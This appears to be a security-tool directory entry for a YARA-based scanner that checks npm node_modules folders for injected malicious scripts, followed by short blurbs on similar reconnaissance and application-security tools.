The purpose of this tool is to run a given set of YARA rules against the given node_module folder. With this approach, We can define YARA rules to identify suspicious scripts which are injected into node packages. Mainly inspired by these articles: Malicious packages in npm, Malicious NPM packages target Amazon, Slack with new dependency attacks, Hunting malicious NPM packages. This package can be added to the CI/CD pipeline. Software Requirements: Docker, Docker Compose, Makefile. How to use: Clone this repo, execute audit operation with `make` command, report available in `artifacts/output.json`.
FEATURES
EXPLORE BY TAGS
SIMILAR TOOLS
An AI-powered Google Dorking tool that helps create effective search queries to uncover sensitive information on the internet.
Amass by OWASP performs comprehensive attack surface mapping and asset discovery.
A search engine for the Internet of Things (IoT) that provides real-time information about connected devices.
Automate OSINT for threat intelligence and attack surface mapping with SpiderFoot.
Simple script to check a domain's email protections and identify vulnerabilities.
Automate Google Hacking Database scraping and searching with Pagodo, a tool for finding vulnerabilities and sensitive information.
All-in-one vulnerability intelligence platform for prioritizing remediation efforts and driving security strategies.
PINNED

Checkmarx SCA
A software composition analysis tool that identifies vulnerabilities, malicious code, and license risks in open source dependencies throughout the software development lifecycle.

Orca Security
A cloud-native application protection platform that provides agentless security monitoring, vulnerability management, and compliance capabilities across multi-cloud environments.

DryRun
A GitHub application that performs automated security code reviews by analyzing contextual security aspects of code changes during pull requests.